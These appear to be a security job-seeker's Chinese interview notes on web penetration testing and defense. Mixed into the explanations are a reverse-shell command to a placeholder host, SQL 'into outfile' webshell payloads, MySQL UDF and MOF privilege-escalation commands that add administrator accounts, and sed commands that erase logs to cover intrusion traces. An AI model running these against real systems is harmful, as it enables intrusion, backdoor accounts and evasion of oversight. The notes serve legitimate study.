網路安全行業面試知識點

2020 年 3 月 8 日
筆記

資訊收集

伺服器的相關資訊（真實ip，系統類型，版本，開放埠，WAF等）  網站指紋識別（包括，cms，cdn，證書等），dns記錄  whois資訊，姓名，備案，郵箱，電話反查（郵箱丟社工庫，社工準備等）  子域名收集，旁站，C段等  google hacking針對化搜索，pdf文件，中間件版本，弱口令掃描等  掃描網站目錄結構，爆後台，網站banner，測試文件，備份等敏感文件泄漏等  傳輸協議，通用漏洞，exp，github源碼等

漏洞挖掘

瀏覽網站，看看網站規模，功能，特點等  埠，弱口令，目錄等掃描,對響應的埠進行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。  XSS，SQL注入，上傳，命令注入，CSRF，cookie安全檢測，敏感資訊，通訊數據傳輸，暴力破解，任意文件上傳，越權訪問，未授權訪問，目錄遍歷，文件 包含，重放攻擊（簡訊轟炸），伺服器漏洞檢測，最後使用漏掃工具等

漏洞利用 | 許可權提升

mysql提權，serv-u提權，oracle提權  windows 溢出提權  linux臟牛,內核漏洞提權e

清除測試數據 | 輸出報告

日誌、測試數據的清理
總結，輸出滲透測試報告，附修復方案

複測

驗證並發現是否有新漏洞，輸出報告，歸檔

問題

在滲透過程中，收集目標站註冊人郵箱對我們有什麼價值？

丟社工庫里看看有沒有泄露密碼，然後嘗試用泄露的密碼進行登錄後台。

用郵箱做關鍵詞進行丟進搜索引擎。
利用搜索到的關聯資訊找出其他郵箱進而得到常用社交帳號。
社工找出社交帳號，裡面或許會找出管理員設置密碼的習慣。
利用已有資訊生成專用字典。

判斷出網站的CMS對滲透有什麼意義？

查找網上已曝光的程式漏洞。
如果開源，還能下載相對應的源碼進行程式碼審計。
滲透時掃目錄的意義

敏感文件、二級目錄掃描
站長的誤操作比如：網站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點

目前已知哪些版本的容器有解析漏洞，具體舉例。

IIS 6.0    /xx.asp/xx.jpg "xx.asp"是文件夾名    IIS 7.0/7.5    默認Fast-CGI開啟，直接在url中圖片地址後面輸入/1.php，會把正常圖片當成php解析  Nginx    版本小於等於0.8.37，利用方法和IIS 7.0/7.5一樣，Fast-CGI關閉情況下也可利用。  空位元組程式碼 xxx.jpg.php

Apache1.x、2.x

上傳的文件命名為：test.php.x1.x2.x3，Apache是從右往左判斷後綴

lighttpd

xx.jpg/xx.php

如何手工快速判斷目標站是windows還是linux伺服器？

linux大小寫敏感,windows大小寫不敏感。

為何一個mysql資料庫的站，只有一個80埠開放？

改了埠,站庫分離,3306不對外網開放,防火牆攔截

看到編輯器，應該先做什麼？

查看編輯器的名稱版本,然後搜索公開的漏洞。

拿到一個webshell發現網站根目錄下有.htaccess文件，我們能做什麼？

能做的事情很多，用隱藏網馬來舉例子：
插入

SetHandler application/x-httpd-php

.jpg文件會被解析成.php文件。

提權時選擇可讀寫目錄，為何盡量不用帶空格的目錄？

exp執行一般需要空格界定參數

後台修改管理員密碼處，原密碼顯示為*。你覺得該怎樣實現讀出這個用戶的密碼？

審查元素把密碼處的password屬性改成text就明文顯示了

為什麼aspx木馬許可權比asp大

aspx使用的是.net技術。IIS 中默認不支援，ASP只是腳本語言而已。入侵的時候asp的木馬一般是guest許可權…APSX的木馬一般是users許可權

如何繞過waf

大小寫轉換法  干擾字元 /*!*/  編碼 base64 unicode hex url ascll  復參數

常見埠

3306 mysql  1433 mssql  1521 oracle  5432 postgresql  6379 redis  27017 mongodb  8080 tomcat/resin/jetty  137 samba  5900 vnc

如何向伺服器寫入webshell

各種上傳漏洞  mysql具有寫入許可權,用sql語句寫入shell  http put方法

Sql注入
SQL注入原理

a. SQL（結構化語句查詢）
b. 提交參數（調用資料庫查詢）的地方是用戶可控的，並未做任何過濾處理
c. 數字型，字元型，搜索型，POST注入，Cookie注入，延時注入，盲注等

SQL注入防護

1、使用安全的API
2、對輸入的特殊字元進行Escape轉義處理
3、使用白名單來規範化輸入驗證方法
4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字元
5、伺服器端在提交資料庫進行SQL查詢之前，對特殊字元進行過濾、轉義、替換、刪除。

規範編碼,字符集

為什麼參數化查詢可以防止sql注入

原理:

使用參數化查詢資料庫伺服器不會把參數的內容當作sql指令的一部分來執行，是在資料庫完成sql指令的編譯後才套用參數運行
簡單的說:
參數化能防注入的原因在於,語句是語句，參數是參數，參數的值並不是語句的一部分，資料庫只按語句的語義跑

SQL頭注入點

UA  REFERER  COOKIE  IP

盲注是什麼？怎麼盲注？

盲注是在SQL注入攻擊過程中，伺服器關閉了錯誤回顯，我們單純通過伺服器返回內容的變化來判斷是否存在SQL注入和利用的方式。盲注的手段有兩種，一個是通過頁面的返回內容是否正確(boolean-based)，來驗證是否存在注入。一個是通過sql語句處理時間的不同來判斷是否存在注入(time-based)，在這裡，可以用benchmark，sleep等造成延時效果的函數，也可以通過構造大笛卡兒積的聯合查詢表來達到延時的目的。

寬位元組注入產生原理以及根本原因

產生原理
在資料庫使用了寬字符集而WEB中沒考慮這個問題的情況下，在WEB層，由於0XBF27是兩個字元，在PHP中比如addslash和magic_quotes_gpc開啟時，由於會對0x27單引號進行轉義，因此0xbf27會變成0xbf5c27,而數據進入資料庫中時，由於0XBF5C是一個另外的字元，因此轉義符號會被前面的bf帶著”吃掉”，單引號由此逃逸出來可以用來閉合語句。
在哪裡編碼
根本原因：
character_set_client(客戶端的字符集)和character_set_connection(連接層的字符集)不同,或轉換函數如，iconv、mb_convert_encoding使用不當。
解決辦法：
統一資料庫、Web應用、作業系統所使用的字符集，避免解析產生差異，最好都設置為UTF-8。
或對數據進行正確的轉義，如mysql_real_escape_string+mysql_set_charset的使用。
sql裡面只有update怎麼利用

先理解這句 SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

如果此 SQL 被修改成以下形式，就實現了注入

1：修改 homepage 值為http://baidu.net‘, userlevel=’3

之後 SQL 語句變為

UPDATE user SET password='mypass', homepage='http://baidu.net', userlevel='3' WHERE id='$id'

userlevel 為用戶級別

2:修改 password 值為mypass)’ WHERE username=’admin’#

之後 SQL 語句變為

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

3：修改 id 值為’ OR username=’admin’
之後 SQL 語句變為

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

sql如何寫shell/單引號被過濾怎麼辦

寫shell: root許可權，GPC關閉，知道文件路徑
outfile函數

`http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\wamp64\www\phpinfo.php' FIELDS TERMINATED BY ''`    `http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\wamp64\www\phpinfo.php'`

寬位元組注入

代替空格的方法

%0a、%0b、%a0 等
/**/ 等注釋符
<>

mysql的網站注入，5.0以上和5.0以下有什麼區別？

5.0以下沒有information_schema這個系統表，無法列表名等，只能暴力跑表名。

5.0以下是多用戶單操作，5.0以上是多用戶多操做。

mysql和sqlserver注入時候的區別

發現 demo.jsp?uid=110 注入點，你有哪幾種思路獲取 webshell，哪種是優選？

有寫入許可權的，構造聯合查詢語句使用using INTO OUTFILE，可以將查詢的輸出重定向到系統的文件中，這樣去寫入 WebShell
使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個 Shell，這樣效率更高
通過構造聯合查詢語句得到網站管理員的賬戶和密碼，然後掃後台登錄後台，再在後台通過改包上傳等方法上傳 Shell

某個防注入系統，如何滲透

系統檢測到你有非法注入的行為。
已記錄您的ip xx.xx.xx.xx
時間:2016:01-23
提交頁面:test.asp?id=15
提交內容:and 1=1
如何利用這個防注入系統拿shell？

如何利用這個防注入系統拿shell？

在URL裡面直接提交一句話，這樣網站就把你的一句話也記錄進資料庫文件了這個時候可以嘗試尋找網站的配置文件直接上菜刀鏈接

如何突破注入時字元被轉義？

寬字元注入
hex編碼繞過

mysql注入點，用工具對目標站直接寫入一句話，需要哪些條件？

root許可權以及網站的絕對路徑。

如果sleep和benchmark關鍵字被過濾掉了該怎麼辦？

1.讓兩個非常大的數據表做笛卡爾積產生大量的計算從而產生時間延遲

2.如果伺服器端採用長連接的話可以利用Mysql的鎖機制即Get_lock()

3.利用複雜的正則表達式去匹配一個超長字元串來產生時間延遲
未知列名情況下的注入利用

如果在利用SQL注入的時候遇到了WAF（安全狗3.5版本會直接攔截關鍵字information_shema），從而無法獲取數據表的列名，這時該怎麼利用漏洞呢？

利用虛表獲取數據

XSS

XSS原理

反射型

用戶提交的數據中可以構造程式碼來執行，從而實現竊取用戶資訊等攻擊。
需要誘使用戶“點擊”一個惡意鏈接，才能攻擊成功

儲存型

存儲型XSS會把用戶輸入的數據“存儲”在伺服器端。
這種XSS具有很強的穩定性。

DOM型

通過修改頁面的DOM節點形成的XSS，稱之為DOM Based XSS。

DOM型和反射型的區別

反射型XSS：通過誘導用戶點擊，我們構造好的惡意payload才會觸發的XSS。
反射型XSS的檢測我們在每次請求帶payload的鏈接時頁面應該是會帶有特定的畸形數據的。
DOM型：通過修改頁面的DOM節點形成的XSS。
DOM-based XSS由於是通過js程式碼進行dom操作產生的XSS，所以在請求的響應中我們甚至不一定會得到相應的畸形數據。
根本區別在我看來是輸出點的不同。
DOM型XSS 自動化測試或人工測試

人工測試思路：找到類似document.write、innerHTML賦值、outterHTML賦值、window.location操作、寫javascript:後內容、eval、setTimeout 、setInterval 等直接執行之類的函數點。找到其變數，回溯變數來源觀察是否可控，是否經過安全函數。
自動化測試參看道哥的部落格，思路是從輸入入手，觀察變數傳遞的過程，最終檢查是否有在危險函數輸出，中途是否有經過安全函數。但是這樣就需要有一個javascript解析器，否則會漏掉一些通過js執行帶入的部分內容。

在回答這段問題的時候，由於平時對客戶的檢測中，基本是憑藉不同功能點的功能加上經驗和直覺來進行檢測，對不同類型的XSS檢測方式實際上並沒有太過細分的標準化檢測方式，所以回答的很爛。。。
如何快速發現xss位置
對於XSS怎麼修補建議

輸入點檢查：對用戶輸入的數據進行合法性檢查，使用filter過濾敏感字元或對進行編碼轉義，針對特定類型數據進行格式檢查。針對輸入點的檢查最好放在伺服器端實現。

輸出點檢查：對變數輸出到HTML頁面中時，對輸出內容進行編碼轉義，輸出在HTML中時，對其進行HTMLEncode，如果輸出在Javascript腳本中時，對其進行JavascriptEncode。
對使用JavascriptEncode的變數都放在引號中並轉義危險字元，data部分就無法逃逸出引號外成為code的一部分。還可以使用更加嚴格的方法，對所有數字字母之外的字元都使用十六進位編碼。此外，要注意在瀏覽器中，HTML的解析會優先於Javascript的解析，編碼的方式也需要考慮清楚，針對不同的輸出點，我們防禦XSS的方法可能會不同，這點可能在之後的文章會做下總結。

除此之外，還有做HTTPOnly對Cookie劫持做限制。

XSS蠕蟲的產生條件

正常情況下，一個是產生XSS點的頁面不屬於self頁面，用戶之間產生交互行為的頁面，都可能造成XSS Worm的產生。不一定需要存儲型XSS

CSRF

CSRF原理

CSRF是跨站請求偽造攻擊，由客戶端發起,是由於沒有在關鍵操作執行時進行是否由用戶自願發起的確認

CSRF防禦

驗證Referer  添加token

token和referer做橫向對比，誰安全等級高？

token安全等級更高，因為並不是任何伺服器都可以取得referer，如果從HTTPS跳到HTTP，也不會發送referer。並且FLASH一些版本中可以自定義referer。
但是token的話，要保證其足夠隨機且不可泄露。(不可預測性原則)

對referer的驗證，從什麼角度去做？如果做，怎麼杜絕問題?

對header中的referer的驗證，一個是空referer，一個是referer過濾或者檢測不完善。
為了杜絕這種問題，在驗證的白名單中，正則規則應當寫完善。
針對token，對token測試會注意哪方面內容，會對token的哪方面進行測試？

引用一段請教前輩的回答：

針對token的攻擊，一是對它本身的攻擊，重放測試一次性、分析加密規則、校驗方式是否正確等，二是結合資訊泄露漏洞對它的獲取，結合著發起組合攻擊
資訊泄露有可能是快取、日誌、get，也有可能是利用跨站
很多跳轉登錄的都依賴token，有一個跳轉漏洞加反射型跨站就可以組合成登錄劫持了
另外也可以結合著其它業務來描述token的安全性及設計不好怎麼被繞過比如搶紅包業務之類的

SSRF

SSRF(Server-Side Request Forgery:伺服器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下，SSRF攻擊的目標是從外網無法訪問的內部系統。（正是因為它是由服務端發起的，所以它能夠請求到與它相連而與外網隔離的內部系統）

SSRF 形成的原因大都是由於服務端提供了從其他伺服器應用獲取數據的功能且沒有對目標地址做過濾與限制。比如從指定URL地址獲取網頁文本內容，載入指定地址的圖片，下載等等。
檢測

SSRF漏洞的驗證方法：

1）因為SSRF漏洞是讓伺服器發送請求的安全漏洞，所以我們就可以通過抓包分析發送的請求是否是由伺服器的發送的，從而來判斷是否存在SSRF漏洞

2）在頁面源碼中查找訪問的資源地址，如果該資源地址類型為 http://www.baidu.com/xxx.php?image=（地址）的就可能存在SSRF漏洞
SSRF漏洞的成因防禦繞過

成因：模擬伺服器對其他伺服器資源進行請求，沒有做合法性驗證。
利用：構造惡意內網IP做探測，或者使用其餘所支援的協議對其餘服務進行攻擊。
防禦：禁止跳轉，限制協議，內外網限制，URL限制。
繞過：使用不同協議，針對IP，IP格式的繞過，針對URL，惡意URL增添其他字元，@之類的。301跳轉+dns rebindding。

文件上傳

文件上傳漏洞原理

由於程式設計師在對用戶文件上傳部分的控制不足或者處理缺陷，而導致用戶可以越過其本身許可權向伺服器上傳可執行的動態腳本文件

常見的上傳繞過方式

前端js驗證：禁用js/burp改包  大小寫  雙重後綴名  過濾繞過 pphphp->php

文件上傳防護

文件上傳目錄設置為不可執行  使用白名單判斷文件上傳類型  用隨機數改寫文件名和路徑

審查上傳點的元素有什麼意義？

有些站點的上傳文件類型的限制是在前端實現的，這時只要增加上傳類型就能突破限制了。

文件包含

原理

引入一段用戶能控制的腳本或程式碼，並讓伺服器端執行
（1）include()等函數通過動態變數的方式引入需要包含的文件；
（2）用戶能夠控制該動態變數。
導致文件包含的函數

PHP：include(), include_once(), require(), re-quire_once(), fopen(), readfile(), …  JSP/Servlet：ava.io.File(), java.io.Fil-eReader(), …  ASP：include file, include virtual,

本地文件包含

能夠打開並包含本地文件的漏洞，被稱為本地文件包含漏洞
XXE
邏輯漏洞
金融行業常見邏輯漏洞

單針對金融業務的
主要是數據的篡改(涉及金融數據，或部分業務的判斷數據)，由競爭條件或者設計不當引起的薅羊毛，交易/訂單資訊泄露，水平越權對別人的賬戶查看或惡意操作，交易或業務步驟繞過。
溢出

中間人攻擊

中間人攻擊是一個（缺乏）相互認證的攻擊；由於客戶端與伺服器之間在SSL握手的過程中缺乏相互認證而造成的漏洞

防禦中間人攻擊的方案通常基於一下幾種技術

1.公鑰基礎建設PKI
使用PKI相互認證機制，客戶端驗證伺服器，伺服器驗證客戶端；上述兩個例子中都是只驗證伺服器，這樣就造成了SSL握手環節的漏洞，而如果使用相互認證的的話，基本可以更強力的相互認證

2.延遲測試

使用複雜加密哈希函數進行計算以造成數十秒的延遲；如果雙方通常情況下都要花費20秒來計算，並且整個通訊花費了60秒計算才到達對方，這就能表明存在第三方中間人。

3.使用其他形式的密鑰交換形式

ARP欺騙

原理:

每台主機都有一個ARP快取表，快取表中記錄了IP地址與MAC地址的對應關係，而區域網數據傳輸依靠的是MAC地址。
在ARP快取表機制存在一個缺陷，就是當請求主機收到ARP應答包後，不會去驗證自己是否向對方主機發送過ARP請求包，就直接把這個返回包中的IP地址與MAC地址的對應關係保存進ARP快取表中，如果原有相同IP對應關係，原有的則會被替換。這樣攻擊者就有了偷聽主機傳輸的數據的可能

防護

1.在主機綁定網關MAC與IP地址為靜態（默認為動態），命令：arp -s 網關IP 網關MAC

2.在網關綁定主機MAC與IP地址

3.使用ARP防火牆

DDOS攻擊

Ddos原理

利用合理的請求造成資源過載，導致服務不可用

syn洪流的原理

偽造大量的源IP地址，分別向伺服器端發送大量的SYN包，此時伺服器端會返回SYN/ACK包，因為源地址是偽造的，所以偽造的IP並不會應答，伺服器端沒有收到偽造IP的回應，會重試3～5次並且等待一個SYNTime（一般為30秒至2分鐘），如果超時則丟棄這個連接。攻擊者大量發送這種偽造源地址的SYN請求，伺服器端將會消耗非常多的資源（CPU和記憶體）來處理這種半連接，同時還要不斷地對這些IP進行SYN+ACK重試。最後的結果是伺服器無暇理睬正常的連接請求，導致拒絕服務。

CC攻擊原理

對一些消耗資源較大的應用頁面不斷發起正常的請求，以達到消耗服務端資源的目的。
DDOS防護

SYN Cookie/SYN Proxy、safereset等演算法。SYN Cookie的主要思想是為每一個IP地址分配一個“Cookie”，並統計每個IP地址的訪問頻率。如果在短時間內收到大量的來自同一個IP地址的數據包，則認為受到攻擊，之後來自這個IP地址的包將被丟棄。
提權

mysql兩種提權方式

udf提權,mof提權
Mysql_UDF提權

要求:
1.目標系統是Windows(Win2000,XP,Win2003)；
2.擁有MYSQL的某個用戶帳號，此帳號必須有對mysql的insert和delete許可權以創建和拋棄函數
3.有root帳號密碼
導出udf:
MYSQL 5.1以上版本，必須要把udf.dll文件放到MYSQL安裝目錄下的libplugin文件夾下才能創建自定義函數
可以再mysql里輸入
select @@basedir
show variables like ‘%plugins%’ 尋找mysql安裝路徑

提權:

使用SQL語句創建功能函數。語法：Create Function 函數名（函數名只能為下面列表中的其中之一）returns string soname ‘導出的DLL路徑’；

create function cmdshell returns string soname ‘udf.dll’  select cmdshell(‘net user arsch arsch /add’);  select cmdshell(‘net localgroup administrators arsch /add’);  drop function cmdshell;

該目錄默認是不存在的，這就需要我們使用webshell找到MYSQL的安裝目錄，並在安裝目錄下創建libplugin文件夾，然後將udf.dll文件導出到該目錄即可。

Mysql mof提權

#pragma namespace("\\.\root\subscription")    instance of __EventFilter as $EventFilter  {      EventNamespace = "Root\Cimv2";      Name  = "filtP2";      Query = "Select * From __InstanceModificationEvent "              "Where TargetInstance Isa "Win32_LocalTime" "              "And TargetInstance.Second = 5";      QueryLanguage = "WQL";  };    instance of ActiveScriptEventConsumer as $Consumer  {      Name = "consPCSV2";      ScriptingEngine = "JScript";      ScriptText =      "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user waitalone waitalone.cn /add")";  };    instance of __FilterToConsumerBinding  {      Consumer   = $Consumer;      Filter = $EventFilter;  };

其中的第18行的命令，上傳前請自己更改。

2、執行load_file及into dumpfile把文件導出到正確的位置即可。

select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'

執行成功後，即可添加一個普通用戶，然後你可以更改命令，再上傳導出執行把用戶提升到管理員許可權，然後3389連接之就ok了。

特殊漏洞

1、Struts2-045
2、Redis未授權訪問
3、產生原因

Redis 默認情況下，會綁定在 0.0.0.0:6379，這樣將會將 Redis 服務暴露到公網上，如果在沒有開啟認證的情況下，可以導致任意用戶在可以訪問目標伺服器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法，可以成功在 Redis 伺服器上寫入公鑰，進而可以使用對應私鑰直接登錄目標伺服器
利用條件和方法

條件:

redis服務以root賬戶運行  redis無密碼或弱密碼進行認證  redis監聽在0.0.0.0公網上

方法:

通過 Redis 的 INFO 命令, 可以查看伺服器相關的參數和敏感資訊, 為攻擊者的後續滲透做鋪墊  上傳SSH公鑰獲得SSH登錄許可權  通過crontab反彈shell  slave主從模式利用

修復

密碼驗證  降權運行  限制ip/修改埠

Jenkins未授權訪問

攻擊者通過未授權訪問進入腳本命令執行介面執行攻擊指令

println “ifconfig -a”.execute().text 執行一些系統命令,利用wget下載webshell

MongoDB未授權訪問

開啟MongoDB服務時不添加任何參數時,默認是沒有許可權驗證的,而且可以遠程訪問資料庫，登錄的用戶可以通過默認埠無需密碼對資料庫進行增、刪、改、查等任意高危操作。
防護

1、為MongoDB添加認證：
1)MongoDB啟動時添加–auth參數
2)給MongoDB添加用戶：
use admin #使用admin庫

db.addUser(“root”, “123456”) #添加用戶名root密碼123456的用戶  db.auth(“root”,“123456”) #驗證下是否添加成功，返回1說明成功

2、禁用HTTP和REST埠
MongoDB自身帶有一個HTTP服務和並支援REST介面。在2.6以後這些介面默認是關閉的。mongoDB默認會使用默認埠監聽web服務，一般不需要通過web方式進行遠程管理，建議禁用。修改配置文件或在啟動的時候選擇–nohttpinterface 參數nohttpinterface=false
3、限制綁定IP
啟動時加入參數
–bind_ip 127.0.0.1
或在/etc/mongodb.conf文件中添加以下內容：
bind_ip = 127.0.0.1

Memcache未授權訪問

Memcached是一套常用的key-value快取系統，由於它本身沒有許可權控制模組，所以對公網開放的Memcache服務很容易被攻擊者掃描發現，攻擊者通過命令交互可直接讀取Memcached中的敏感資訊。
利用

1、登錄機器執行netstat -an |more命令查看埠監聽情況。回顯0.0.0.0:11211表示在所有網卡進行監聽，存在memcached未授權訪問漏洞。

2、telnet 11211，或nc -vv 11211，提示連接成功表示漏洞存在
漏洞加固

1、設置memchached只允許本地訪問  2、禁止外網訪問Memcached 11211埠  3、編譯時加上–enable-sasl，啟用SASL認證

FFMPEG 本地文件讀取漏洞
原理

通過調用加密API將payload加密放入一個會被執行的段位元組中。但是具體回答工程中我只回答道了SSRF老洞，m3u8頭，偏移量，加密。
安全知識

WEB

常用WEB開發JAVA框架

STRUTS,SPRING

常見的java框架漏洞
其實面試官問這個問題的時候我不太清楚他要問什麼，我提到struts的045 048，java常見反序列化。
045 錯誤處理引入了ognl表達式
048 封裝action的過程中有一步調用getstackvalue遞歸獲取ognl表達式
反序列化操作對象，通過手段引入。apache common的反射機制、readobject的重寫，其實具體的我也記不清楚。。。然後這部分就結束了

同源策略

同源策略限制不同源對當前document的屬性內容進行讀取或設置。
不同源的區分：協議、域名、子域名、IP、埠，以上有不同時即不同源。
Jsonp安全攻防技術，怎麼寫Jsonp的攻擊頁面？
涉及到Jsonp的安全攻防內容

JSON劫持、Callback可定義、JSONP內容可定義、Content-type不為json。
攻擊頁面

JSON劫持，跨域劫持敏感資訊，頁面類似於

function wooyun(v){      alert(v.username);  }

Content-type不正確情況下，JSONP和Callback內容可定義可造成XSS。
JSONP和FLASH及其他的利用參照知道創宇的JSONP安全攻防技術。

PHP

php中命令執行涉及到的函數

1，程式碼執行：

eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function()

2，文件讀取：

file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

3，命令執行：

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()  安全模式下繞過php的disable fuction

DL函數，組件漏洞，環境變數。

PHP弱類型

== 在進行比較的時候，會先將字元串類型轉化成相同，再比較

如果比較一個數字和字元串或者比較涉及到數字內容的字元串，則字元串會被轉換成數值並且比較按照數值來進行

0e開頭的字元串等於0
資料庫
各種資料庫文件存放的位置

mysql:/usr/local/mysql/data/ C:ProgramDataMySQLMySQL Server 5.6Data
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/

系統知識

如何清理日誌

meterpreter: clearev
入侵 Linux 伺服器後需要清除哪些日誌？

web日誌，如apache的access.log,error.log。直接將日誌清除過於明顯,一般使用sed進行定向清除

e.g. sed -i -e ‘/192.169.1.1/d’

history命令的清除，也是對~/.bash_history進行定向清除

wtmp日誌的清除，/var/log/wtmp

登錄日誌清除 /var/log/secure

LINUX基礎

查看當前埠連接的命令有哪些？netstat 和 ss 命令的區別和優缺點

netstat -antp ss -l

ss的優勢在於它能夠顯示更多更詳細的有關TCP和連接狀態的資訊，而且比netstat更快速更高效。

反彈 shell 的常用命令？一般常反彈哪一種 shell？為什麼?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

通過Linux系統的/proc目錄，能夠獲取到哪些資訊，這些資訊可以在安全上有哪些應用？

ls /proc

系統資訊，硬體資訊，內核版本，載入的模組，進程

linux系統中，檢測哪些配置文件的配置項，能夠提升SSH的安全性？

/etc/ssh/sshd___config
iptables配置

如何一條命令查看文件內容最後一百行？

tail -n 100 filename

Windows基礎

如何加固一個域環境下的Windows桌面工作環境？請給出你的思路。

密碼學

AES／DES的具體工作步驟
RSA演算法

加密:
$$
密文＝明文^EmodN
$$
RSA加密是對明文的E次方後除以N後求餘數的過程

$$
公鑰＝(E,N)
$$
解密:

$$
明文＝密文^DmodN
$$

$$
私鑰＝(D,N)
$$

三個參數n,e1,e2

n是兩個大質數p,q的積
分組密碼的加密模式
如何生成一個安全的隨機數？

引用之前一個學長的答案，可以通過一些物理系統生成隨機數，如電壓的波動、磁碟磁頭讀/寫時的尋道時間、空中電磁波的雜訊等。

SSL握手過程

建立TCP連接、客戶端發送SSL請求、服務端處理SSL請求、客戶端發送公共密鑰加密過的隨機數據、服務端用私有密鑰解密加密後的隨機數據並協商暗號、服務端跟客戶端利用暗號生成加密演算法跟密鑰key、之後正常通訊。
這部分本來是忘了的，但是之前看SSL Pinning的時候好像記了張圖在腦子裡，掙扎半天還是沒敢確定，遂放棄。。。
對稱加密與非對稱加密的不同，分別用在哪些方面

TCP/IP

TCP三次握手的過程以及對應的狀態轉換

（1）客戶端向伺服器端發送一個SYN包，包含客戶端使用的埠號和初始序列號x；
（2）伺服器端收到客戶端發送來的SYN包後，向客戶端發送一個SYN和ACK都置位的TCP報文，包含確認號xx1和伺服器端的初始序列號y；
（3）客戶端收到伺服器端返回的SYNSACK報文後，向伺服器端返回一個確認號為yy1、序號為xx1的ACK報文，一個標準的TCP連接完成。

TCP和UDP協議區別

tcp面向連接,udp面向報文
tcp對系統資源的要求多
udp結構簡單
tcp保證數據完整性和順序，udp不保證
https的建立過程

1、客戶端發送請求到伺服器端
2、伺服器端返回證書和公開密鑰，公開密鑰作為證書的一部分而存在
3、客戶端驗證證書和公開密鑰的有效性，如果有效，則生成共享密鑰並使用公開密鑰加密發送到伺服器端
4、伺服器端使用私有密鑰解密數據，並使用收到的共享密鑰加密數據，發送到客戶端
5、客戶端使用共享密鑰解密數據
6、SSL加密建立

流量分析
wireshark簡單的過濾規則

過濾ip:

過濾源ip地址:ip.src==1.1.1.1;,目的ip地址:ip.dst==1.1.1.1;

過濾埠:

過濾80埠:tcp.port==80,源埠:tcp.srcport==80,目的埠:tcp.dstport==80

協議過濾:

直接輸入協議名即可,如http協議http

http模式過濾:

過濾get/post包http.request.mothod==”GET/POST”
防火牆
簡述路由器交換機、防火牆等網路設備常用的幾個基礎配置加固項，以及配置方法。

深信服一面:

了解哪些漏洞
文件上傳有哪些防護方式
用什麼掃描埠，目錄
如何判斷注入
注入有防護怎麼辦
有沒有寫過tamper
3306 1443 8080是什麼埠
電腦網路從物理層到應用層xxxx
有沒有web服務開發經驗
如何向伺服器寫入webshell
有沒有用過xss平台
網站滲透的流程
mysql兩種提權方式（udf，？）
常見加密方式xxx
ddos如何防護
有沒有抓過包，會不會寫wireshark過濾規則
清理日誌要清理哪些

某安全公司:

你知道哪些能拿下一個網站的漏洞
order by注入 limit注入後面跟的函數有什麼不同
order by 含義
sqlserver注入
基於css的xss
基於flash的xss原理
過濾了單引號into outfile還能用嗎
除了script ,html事件之外還有哪些存在xss的地方
iis拒絕服務原理
ssrf除了探測主機外如何進一步進行攻擊
uname -a ‘-a’參數可控如何執行多條指令

目前累計這些經驗。持續更新。

（2020年3月8日）